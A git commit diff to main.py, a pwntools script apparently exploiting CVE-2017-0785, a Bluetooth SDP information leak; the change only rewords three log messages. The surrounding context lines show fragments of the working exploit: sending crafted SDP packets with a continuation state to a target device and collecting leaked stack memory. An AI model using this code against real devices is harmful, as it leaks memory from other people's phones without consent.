aboutsummaryrefslogtreecommitdiff
diff options
context:
space:
mode:
-rw-r--r--main.py6
1 files changed, 3 insertions, 3 deletions
diff --git a/main.py b/main.py
index 9e861e7..58653c6 100644
--- a/main.py
+++ b/main.py
@@ -2,7 +2,7 @@ from pwn import *
import bluetooth
if not 'TARGET' in args:
- log.info("Usage: CVE-2017-0785.py TARGET=XX:XX:XX:XX:XX:XX")
+ log.info("Atleast Correctly USE it")
exit()
target = args['TARGET']
@@ -35,12 +35,12 @@ sock.send(packet(service_long, '\x00'))
data = sock.recv(mtu)
if data[-3] != '\x02':
- log.error('Invalid continuation state received.')
+ log.error('It did not work.')
stack = ''
for i in range(1, n):
- p.status('Sending packet %d' % i)
+ p.status('Doing Work %d' % i)
sock.send(packet(service_short, data[-3:]))
data = sock.recv(mtu)
stack += data[9:-3]